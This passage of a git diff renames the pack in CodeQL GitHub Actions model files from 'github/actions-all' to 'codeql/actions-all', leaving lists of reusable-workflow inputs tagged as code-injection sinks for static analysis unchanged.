["getsentry/sentry-dart/.github/workflows/analyze.yml", "*", "input.panaThreshold", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml index a7069a8fa4f..31113d603ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-unity.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index 3ec3c008301..d8e08a8e2bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index f4c09189ba6..b7478e325a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 46b715358e0..fff04025bc5 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index ca728bfced2..be5ac94db5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index c31b5c8fe0c..b8633806ac7 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index e53c0a2780b..8e534e5be92 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index 2c904674125..44aa0ea3a92 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index cff10b709e9..cd17a2ca4a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index 31e4dbbf7ab..d96c0c99d0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 5aca8a7070d..f07f5ba54ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 179c882eba1..39110829147 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index a702bdd4784..196c25e14e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index 105a5b49f3d..7a2e2fea0eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 4e4aa9f7986..d00a80de5d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 4272f3376ce..4f7926a22a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] @@ -15,7 +15,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "input.total-runners", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4752bce29b9..a0c0b5638dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index e493955ca4c..494c63d6272 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index e3c0040f7df..bd855d53f13 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index daaa34ab8ab..f499896a72f 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 9bfe6180481..66bd5e8b99d 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index d8cd44f08ee..fc0d7a48ca3 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index 9b1fd73494e..e3a048ee25c 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 2fafb1f39b6..db3fb546f0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 0f4b87acc62..3a1b8c8403e 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 4b58c4a27b1..9f633ceca2a 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 36e6df71d47..96eb05c0699 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 444291b0c50..9448aaeabe1 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index ebd11dd1811..d9af00581aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 3dfd3db12f5..aee71d38351 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index a47ce91bf1b..cb06e03a0b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index f4114b0a396..837ac52856b 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index a5b367ab355..737350d2379 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 5aab353540a..3fd4d615778 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index db6b7c28c51..caf13251f20 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index bd2ceb9eeb1..2f8790197e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index d52fc08b2fe..f51482fc02e 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 8a664d1bc87..67b335536ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index bbfe6cfc501..514fbac1d52 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 75bbf328d64..6a578723d86 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 6cd55f46f64..14afd31d152 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 4c85243e415..772dd2e7c71 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index fd1c5ae4149..477e782dde6 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index d848e7587ca..4d66b285403 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index e2e3fa8f593..8bd5aacbd9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 69d627bdc7f..cd1933d8a23 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 11687fa31b6..9e1b26e1a29 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index 3d394751599..4977c1d9881 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", 